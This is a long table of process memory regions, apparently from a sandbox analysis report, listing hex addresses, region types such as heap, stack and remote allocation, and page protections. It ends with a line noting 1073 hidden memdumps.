35F0000
|
trusted library section
|
page read and write
|
||
|
DE31000
|
direct allocation
|
page execute and read and write
|
||
|
4F5E000
|
stack
|
page read and write
|
||
|
242C9000
|
stack
|
page read and write
|
||
|
2428A000
|
stack
|
page read and write
|
||
|
265DE000
|
heap
|
page read and write
|
||
|
243A89D5000
|
trusted library allocation
|
page read and write
|
||
|
26B71000
|
trusted library allocation
|
page read and write
|
||
|
387000
|
unkown
|
page readonly
|
||
|
26C40000
|
trusted library allocation
|
page read and write
|
||
|
7730000
|
direct allocation
|
page read and write
|
||
|
35E0000
|
trusted library section
|
page read and write
|
||
|
8B74000
|
heap
|
page read and write
|
||
|
8B19000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
1EA790A4000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA770B8000
|
heap
|
page read and write
|
||
|
26660000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
|
9BD7DFE000
|
stack
|
page read and write
|
||
|
1EA7905D000
|
heap
|
page read and write
|
||
|
1EA791EF000
|
heap
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
26C20000
|
trusted library allocation
|
page read and write
|
||
|
1EA79183000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
9831000
|
direct allocation
|
page execute and read and write
|
||
|
1EA791E8000
|
heap
|
page read and write
|
||
|
8C80000
|
trusted library allocation
|
page read and write
|
||
|
1EA791BA000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
7440000
|
heap
|
page execute and read and write
|
||
|
1EA7743B000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
24190000
|
remote allocation
|
page read and write
|
||
|
243A8642000
|
trusted library allocation
|
page read and write
|
||
|
243A6880000
|
trusted library allocation
|
page read and write
|
||
|
1EA791CD000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
1EA79479000
|
heap
|
page read and write
|
||
|
1EA791CD000
|
heap
|
page read and write
|
||
|
5011000
|
trusted library allocation
|
page read and write
|
||
|
1EA796B0000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
|
8C9C000
|
heap
|
page read and write
|
||
|
1EA7920B000
|
heap
|
page read and write
|
||
|
243A80B0000
|
heap
|
page execute and read and write
|
||
|
1EA792B0000
|
heap
|
page read and write
|
||
|
1EA791D1000
|
heap
|
page read and write
|
||
|
243A7EE0000
|
trusted library allocation
|
page read and write
|
||
|
243C0710000
|
heap
|
page read and write
|
||
|
1EA79249000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page execute and read and write
|
||
|
243C0630000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
243B8489000
|
trusted library allocation
|
page read and write
|
||
|
23AD000
|
stack
|
page read and write
|
||
|
1EA7743E000
|
heap
|
page read and write
|
||
|
1EA79426000
|
heap
|
page read and write
|
||
|
26BC0000
|
trusted library allocation
|
page read and write
|
||
|
1EA792BD000
|
heap
|
page read and write
|
||
|
232D36B8000
|
heap
|
page read and write
|
||
|
1EA7919A000
|
heap
|
page read and write
|
||
|
26520000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
1EA79046000
|
heap
|
page read and write
|
||
|
265F1000
|
heap
|
page read and write
|
||
|
243A861C000
|
trusted library allocation
|
page read and write
|
||
|
1EA77380000
|
remote allocation
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
54AF000
|
stack
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA794C7000
|
heap
|
page read and write
|
||
|
243C076D000
|
heap
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
55B267E000
|
stack
|
page read and write
|
||
|
1EA79177000
|
heap
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
89C0000
|
trusted library allocation
|
page read and write
|
||
|
1EA790BB000
|
heap
|
page read and write
|
||
|
1EA7925C000
|
heap
|
page read and write
|
||
|
1EA791C8000
|
heap
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page execute and read and write
|
||
|
511E000
|
stack
|
page read and write
|
||
|
1EA790AD000
|
heap
|
page read and write
|
||
|
1EA7919A000
|
heap
|
page read and write
|
||
|
361B000
|
heap
|
page read and write
|
||
|
3195000
|
heap
|
page read and write
|
||
|
55B20D3000
|
stack
|
page read and write
|
||
|
7740000
|
direct allocation
|
page read and write
|
||
|
4E9E000
|
stack
|
page read and write
|
||
|
1EA7949D000
|
heap
|
page read and write
|
||
|
6078000
|
trusted library allocation
|
page read and write
|
||
|
267DC000
|
stack
|
page read and write
|
||
|
AC31000
|
direct allocation
|
page execute and read and write
|
||
|
387000
|
unkown
|
page readonly
|
||
|
2438C000
|
stack
|
page read and write
|
||
|
243A8215000
|
trusted library allocation
|
page read and write
|
||
|
26B47000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
1EA79241000
|
heap
|
page read and write
|
||
|
7B71000
|
heap
|
page read and write
|
||
|
1EA77380000
|
remote allocation
|
page read and write
|
||
|
1EA79052000
|
heap
|
page read and write
|
||
|
1EA790BB000
|
heap
|
page read and write
|
||
|
26620000
|
trusted library allocation
|
page read and write
|
||
|
1EA77191000
|
heap
|
page read and write
|
||
|
1EA79076000
|
heap
|
page read and write
|
||
|
4DF5000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA79040000
|
heap
|
page read and write
|
||
|
1EA791BA000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
1EA79218000
|
heap
|
page read and write
|
||
|
2420F000
|
stack
|
page read and write
|
||
|
243A7FE9000
|
heap
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
8B20000
|
heap
|
page read and write
|
||
|
1EA794C7000
|
heap
|
page read and write
|
||
|
1EA7906D000
|
heap
|
page read and write
|
||
|
243A942F000
|
trusted library allocation
|
page read and write
|
||
|
1EA79210000
|
heap
|
page read and write
|
||
|
26BD0000
|
trusted library allocation
|
page read and write
|
||
|
1EA790B6000
|
heap
|
page read and write
|
||
|
1EA791DB000
|
heap
|
page read and write
|
||
|
1EA79441000
|
heap
|
page read and write
|
||
|
387000
|
unkown
|
page readonly
|
||
|
26C20000
|
trusted library allocation
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
32EE000
|
stack
|
page read and write
|
||
|
243A9FD3000
|
trusted library allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
55B360D000
|
stack
|
page read and write
|
||
|
1EA7717A000
|
heap
|
page read and write
|
||
|
1EA79021000
|
heap
|
page read and write
|
||
|
1EA79288000
|
heap
|
page read and write
|
||
|
55B25FF000
|
stack
|
page read and write
|
||
|
6039000
|
trusted library allocation
|
page read and write
|
||
|
1EA790BC000
|
heap
|
page read and write
|
||
|
243A8704000
|
trusted library allocation
|
page read and write
|
||
|
1EA77172000
|
heap
|
page read and write
|
||
|
32A0000
|
heap
|
page read and write
|
||
|
243A654B000
|
heap
|
page read and write
|
||
|
1EA791E0000
|
heap
|
page read and write
|
||
|
2412F000
|
stack
|
page read and write
|
||
|
243A8845000
|
trusted library allocation
|
page read and write
|
||
|
27A0000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
1EA79239000
|
heap
|
page read and write
|
||
|
79CE000
|
stack
|
page read and write
|
||
|
1FEC6475000
|
heap
|
page read and write
|
||
|
318F000
|
stack
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
26660000
|
heap
|
page read and write
|
||
|
1EA791D1000
|
heap
|
page read and write
|
||
|
24240000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
243A9A4C000
|
trusted library allocation
|
page read and write
|
||
|
32B3000
|
heap
|
page read and write
|
||
|
568B000
|
stack
|
page read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
243C079E000
|
heap
|
page read and write
|
||
|
1EA79011000
|
heap
|
page read and write
|
||
|
381000
|
unkown
|
page execute read
|
||
|
243B8191000
|
trusted library allocation
|
page read and write
|
||
|
1EA792DC000
|
heap
|
page read and write
|
||
|
380000
|
unkown
|
page readonly
|
||
|
4F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
8B72000
|
heap
|
page read and write
|
||
|
1EA79610000
|
heap
|
page read and write
|
||
|
1EA79022000
|
heap
|
page read and write
|
||
|
244E0000
|
trusted library allocation
|
page read and write
|
||
|
5846000
|
trusted library allocation
|
page read and write
|
||
|
1EA791DB000
|
heap
|
page read and write
|
||
|
244BA000
|
trusted library allocation
|
page read and write
|
||
|
1EA791E0000
|
heap
|
page read and write
|
||
|
1EA790B9000
|
heap
|
page read and write
|
||
|
1EA79254000
|
heap
|
page read and write
|
||
|
243A6460000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
240EE000
|
stack
|
page read and write
|
||
|
244C1000
|
trusted library allocation
|
page read and write
|
||
|
75A0000
|
direct allocation
|
page read and write
|
||
|
243A6544000
|
heap
|
page read and write
|
||
|
7D4E000
|
stack
|
page read and write
|
||
|
1EA79438000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
1EA79183000
|
heap
|
page read and write
|
||
|
1EA7943F000
|
heap
|
page read and write
|
||
|
1FEC6430000
|
heap
|
page read and write
|
||
|
75D0000
|
direct allocation
|
page read and write
|
||
|
243A9FEB000
|
trusted library allocation
|
page read and write
|
||
|
1EA791CD000
|
heap
|
page read and write
|
||
|
1EA790B9000
|
heap
|
page read and write
|
||
|
243A87C3000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
243C075A000
|
heap
|
page read and write
|
||
|
24490000
|
trusted library allocation
|
page read and write
|
||
|
1EA791DB000
|
heap
|
page read and write
|
||
|
7C57000
|
trusted library allocation
|
page read and write
|
||
|
277E000
|
stack
|
page read and write
|
||
|
243C0792000
|
heap
|
page read and write
|
||
|
9BD82FD000
|
stack
|
page read and write
|
||
|
244C6000
|
trusted library allocation
|
page read and write
|
||
|
1EA791BA000
|
heap
|
page read and write
|
||
|
8E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA791BE000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
1EA7717F000
|
heap
|
page read and write
|
||
|
8EB0000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
1EA7901C000
|
heap
|
page read and write
|
||
|
9BD792A000
|
stack
|
page read and write
|
||
|
8A90000
|
direct allocation
|
page read and write
|
||
|
243A7EB0000
|
trusted library allocation
|
page read and write
|
||
|
39D000
|
unkown
|
page readonly
|
||
|
1EA790C1000
|
heap
|
page read and write
|
||
|
8AA0000
|
heap
|
page read and write
|
||
|
1EA791C0000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
1EA7902C000
|
heap
|
page read and write
|
||
|
28D0000
|
heap
|
page read and write
|
||
|
4DCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2403E000
|
stack
|
page read and write
|
||
|
3269000
|
heap
|
page read and write
|
||
|
243A7FB0000
|
heap
|
page read and write
|
||
|
1EA792A5000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
337C000
|
heap
|
page read and write
|
||
|
560E000
|
stack
|
page read and write
|
||
|
1EA792DC000
|
heap
|
page read and write
|
||
|
243A806A000
|
heap
|
page read and write
|
||
|
7FFD3492A000
|
trusted library allocation
|
page read and write
|
||
|
1EA7919A000
|
heap
|
page read and write
|
||
|
243A89D7000
|
trusted library allocation
|
page read and write
|
||
|
7E41000
|
remote allocation
|
page execute and read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
26680000
|
trusted library allocation
|
page read and write
|
||
|
3099000
|
stack
|
page read and write
|
||
|
243A6440000
|
heap
|
page read and write
|
||
|
1EA79225000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA772A0000
|
heap
|
page read and write
|
||
|
5000000
|
heap
|
page execute and read and write
|
||
|
1EA791E0000
|
heap
|
page read and write
|
||
|
243A6565000
|
heap
|
page read and write
|
||
|
243A658C000
|
heap
|
page read and write
|
||
|
8C10000
|
direct allocation
|
page read and write
|
||
|
A47000
|
trusted library allocation
|
page execute and read and write
|
||
|
542E000
|
stack
|
page read and write
|
||
|
4FDC000
|
stack
|
page read and write
|
||
|
1EA790AF000
|
heap
|
page read and write
|
||
|
5C4B4FD000
|
stack
|
page read and write
|
||
|
2459D000
|
trusted library allocation
|
page read and write
|
||
|
55B2ABE000
|
stack
|
page read and write
|
||
|
314E000
|
stack
|
page read and write
|
||
|
1EA79011000
|
heap
|
page read and write
|
||
|
7FFD34773000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CC0000
|
heap
|
page execute and read and write
|
||
|
55B28BC000
|
stack
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
7DCD000
|
stack
|
page read and write
|
||
|
4F70000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
232D5220000
|
heap
|
page read and write
|
||
|
243A8618000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3478B000
|
trusted library allocation
|
page read and write
|
||
|
8BF0000
|
direct allocation
|
page read and write
|
||
|
55B2837000
|
stack
|
page read and write
|
||
|
75B0000
|
direct allocation
|
page read and write
|
||
|
8C7E000
|
stack
|
page read and write
|
||
|
A4B000
|
trusted library allocation
|
page execute and read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
1EA791BD000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
1EA7923C000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
272A0000
|
heap
|
page read and write
|
||
|
1EA792C8000
|
heap
|
page read and write
|
||
|
1EA7929D000
|
heap
|
page read and write
|
||
|
1EA794F4000
|
heap
|
page read and write
|
||
|
243C0610000
|
heap
|
page read and write
|
||
|
1EA791D1000
|
heap
|
page read and write
|
||
|
1EA79024000
|
heap
|
page read and write
|
||
|
771D000
|
stack
|
page read and write
|
||
|
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
|
3438000
|
heap
|
page read and write
|
||
|
266A0000
|
heap
|
page read and write
|
||
|
75F0000
|
direct allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
1EA790B9000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
385000
|
unkown
|
page readonly
|
||
|
1EA793B8000
|
heap
|
page read and write
|
||
|
8B23000
|
heap
|
page read and write
|
||
|
1FEC6440000
|
heap
|
page read and write
|
||
|
243A89BA000
|
trusted library allocation
|
page read and write
|
||
|
1EA7915E000
|
heap
|
page read and write
|
||
|
561F000
|
stack
|
page read and write
|
||
|
3482000
|
heap
|
page read and write
|
||
|
1EA7946E000
|
heap
|
page read and write
|
||
|
1FEC6474000
|
heap
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
243A8609000
|
trusted library allocation
|
page read and write
|
||
|
1EA7908B000
|
heap
|
page read and write
|
||
|
243A83B7000
|
trusted library allocation
|
page read and write
|
||
|
1EA79044000
|
heap
|
page read and write
|
||
|
7A9AFDF000
|
stack
|
page read and write
|
||
|
1EA77360000
|
heap
|
page read and write
|
||
|
1EA792A0000
|
heap
|
page read and write
|
||
|
243B81B1000
|
trusted library allocation
|
page read and write
|
||
|
265F1000
|
heap
|
page read and write
|
||
|
8C00000
|
direct allocation
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page execute and read and write
|
||
|
A20000
|
trusted library allocation
|
page read and write
|
||
|
1EA79411000
|
heap
|
page read and write
|
||
|
380000
|
unkown
|
page readonly
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
1EA79259000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA791DB000
|
heap
|
page read and write
|
||
|
3279000
|
stack
|
page read and write
|
||
|
332E000
|
stack
|
page read and write
|
||
|
1EA7905F000
|
heap
|
page read and write
|
||
|
243C074A000
|
heap
|
page read and write
|
||
|
7750000
|
direct allocation
|
page read and write
|
||
|
7FFD34AE0000
|
trusted library allocation
|
page read and write
|
||
|
232D36B0000
|
heap
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
55B26F9000
|
stack
|
page read and write
|
||
|
8A15000
|
heap
|
page read and write
|
||
|
7C20000
|
trusted library allocation
|
page read and write
|
||
|
1EA7903C000
|
heap
|
page read and write
|
||
|
8ED0000
|
direct allocation
|
page read and write
|
||
|
26B63000
|
trusted library allocation
|
page read and write
|
||
|
1EA79036000
|
heap
|
page read and write
|
||
|
26B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA79038000
|
heap
|
page read and write
|
||
|
7D8E000
|
stack
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
A1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA7907E000
|
heap
|
page read and write
|
||
|
1EA79037000
|
heap
|
page read and write
|
||
|
55B350E000
|
stack
|
page read and write
|
||
|
232D38D0000
|
heap
|
page read and write
|
||
|
24500000
|
trusted library allocation
|
page read and write
|
||
|
4DD0000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
4241000
|
remote allocation
|
page execute and read and write
|
||
|
3455000
|
heap
|
page read and write
|
||
|
26B90000
|
trusted library allocation
|
page read and write
|
||
|
243A8A0D000
|
trusted library allocation
|
page read and write
|
||
|
1EA7924C000
|
heap
|
page read and write
|
||
|
243CD000
|
stack
|
page read and write
|
||
|
B631000
|
direct allocation
|
page execute and read and write
|
||
|
9BD81FB000
|
stack
|
page read and write
|
||
|
2665C000
|
stack
|
page read and write
|
||
|
1EA7906C000
|
heap
|
page read and write
|
||
|
243AA10A000
|
trusted library allocation
|
page read and write
|
||
|
1EA7907C000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
1EA791A2000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA790BB000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
380000
|
unkown
|
page readonly
|
||
|
1EA79179000
|
heap
|
page read and write
|
||
|
1EA79110000
|
heap
|
page read and write
|
||
|
35B0000
|
heap
|
page read and write
|
||
|
1EA7904D000
|
heap
|
page read and write
|
||
|
1EA791DB000
|
heap
|
page read and write
|
||
|
35D0000
|
heap
|
page read and write
|
||
|
4060000
|
remote allocation
|
page execute and read and write
|
||
|
1EA79271000
|
heap
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
1EA79111000
|
heap
|
page read and write
|
||
|
62BB000
|
trusted library allocation
|
page read and write
|
||
|
1FEC64A0000
|
heap
|
page read and write
|
||
|
266A1000
|
heap
|
page read and write
|
||
|
265F5000
|
heap
|
page read and write
|
||
|
243A9F68000
|
trusted library allocation
|
page read and write
|
||
|
1EA7920E000
|
heap
|
page read and write
|
||
|
243C07A9000
|
heap
|
page read and write
|
||
|
26B73000
|
trusted library allocation
|
page read and write
|
||
|
2610000
|
heap
|
page read and write
|
||
|
1EA791E0000
|
heap
|
page read and write
|
||
|
26660000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
28DC000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
7EF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
7A0F000
|
stack
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
1EA790BB000
|
heap
|
page read and write
|
||
|
A10000
|
trusted library allocation
|
page read and write
|
||
|
4EB0000
|
heap
|
page read and write
|
||
|
1EA79280000
|
heap
|
page read and write
|
||
|
1EA770A0000
|
heap
|
page read and write
|
||
|
7720000
|
direct allocation
|
page read and write
|
||
|
381000
|
unkown
|
page execute read
|
||
|
7FFD34940000
|
trusted library allocation
|
page execute and read and write
|
||
|
243A9F3D000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
559E000
|
stack
|
page read and write
|
||
|
1EA7743C000
|
heap
|
page read and write
|
||
|
23F5C000
|
stack
|
page read and write
|
||
|
1EA7743A000
|
heap
|
page read and write
|
||
|
7D0E000
|
stack
|
page read and write
|
||
|
2468E000
|
trusted library allocation
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
385000
|
unkown
|
page readonly
|
||
|
1EA79290000
|
heap
|
page read and write
|
||
|
6011000
|
trusted library allocation
|
page read and write
|
||
|
1EA79056000
|
heap
|
page read and write
|
||
|
1EA79269000
|
heap
|
page read and write
|
||
|
8CA4000
|
heap
|
page read and write
|
||
|
26B63000
|
trusted library allocation
|
page read and write
|
||
|
1EA79044000
|
heap
|
page read and write
|
||
|
1EA79211000
|
heap
|
page read and write
|
||
|
9BD7CFE000
|
stack
|
page read and write
|
||
|
1EA790BB000
|
heap
|
page read and write
|
||
|
1EA79228000
|
heap
|
page read and write
|
||
|
1EA7958C000
|
heap
|
page read and write
|
||
|
1EA791E0000
|
heap
|
page read and write
|
||
|
1EA79298000
|
heap
|
page read and write
|
||
|
1EA791D1000
|
heap
|
page read and write
|
||
|
243D0000
|
trusted library allocation
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
385000
|
unkown
|
page readonly
|
||
|
26BF0000
|
trusted library allocation
|
page read and write
|
||
|
1EA792DC000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page read and write
|
||
|
26B82000
|
trusted library allocation
|
page read and write
|
||
|
1EA79274000
|
heap
|
page read and write
|
||
|
243A6870000
|
heap
|
page readonly
|
||
|
1EA79215000
|
heap
|
page read and write
|
||
|
8A45000
|
trusted library allocation
|
page read and write
|
||
|
26B7D000
|
trusted library allocation
|
page read and write
|
||
|
8A60000
|
heap
|
page readonly
|
||
|
243A9F60000
|
trusted library allocation
|
page read and write
|
||
|
1EA79091000
|
heap
|
page read and write
|
||
|
55B2B3B000
|
stack
|
page read and write
|
There are 1073 hidden memdumps, click here to show them.